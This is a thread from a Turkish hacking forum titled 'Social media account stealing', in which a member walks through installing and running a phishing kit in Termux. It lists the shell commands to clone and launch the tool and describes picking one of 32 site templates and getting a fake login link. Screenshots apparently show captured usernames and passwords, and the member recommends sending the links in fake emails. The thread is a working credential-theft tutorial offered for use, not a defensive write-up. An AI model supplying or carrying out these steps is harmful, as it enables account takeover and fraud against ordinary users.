Sosyal Medya Hesap çalma

alzap

Yeni üye
14 Tem 2021
20
1
17
Merhaba, yeniyımde verdıgınız linkte ne yapmamız gerekiyor onu anlamadım

mitat1

Uzman üye
1 Eki 2022
1,075
753
SerasZen
Herkese merhaba bu konuda sosyal medya hesap çalmayı gõsterecem. Işlemeri termux üzerinden yapacaz. Kodlarımızı yazalım.
Kodlar:
pkg update && pkg update
pkg install php
pkg install ssh
git clone GitHub - xHak9x/SocialPhish: The most complete Phishing Tool, with 32 templates +1 customizable
ls
cd SocialPhish
ls
chmod +x *
./socialphish.sh
EOlBoq.jpg

Bu tool sayesinde 32 sosyal platform üzerinden hack yapa bilirsiniz. Ben 1i seçecem.
Ardından bize seçenek sunacak 2 tane ngrok artık bilindik oldu o yüzden ngrok seçmeyecez. 1 yazıp enterlayın. Sonra port girin. 4 rakamlı olsun fark etmez.Bize link verecek fotorafdaki gibi.
P73Ayv.jpg

Bi deneme yapalım.
P73ARQ.jpg

Gõrdüğünüz gibi şifre ve kullanici adı geldi. Ngrokda bazen hata veriyo ama bu hata vermez. Fake maillerinzde mail taslağina bu linkleri yerleştire bilirsiniz. Site kurmaya falan ihtiyaç yok.
Videolu anlatım:
Iyi forumlar

Kusura bakmayın bi kodu yanlîş yazmışım pkg install ssh değil pkg install openssh
Eline sağlk

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.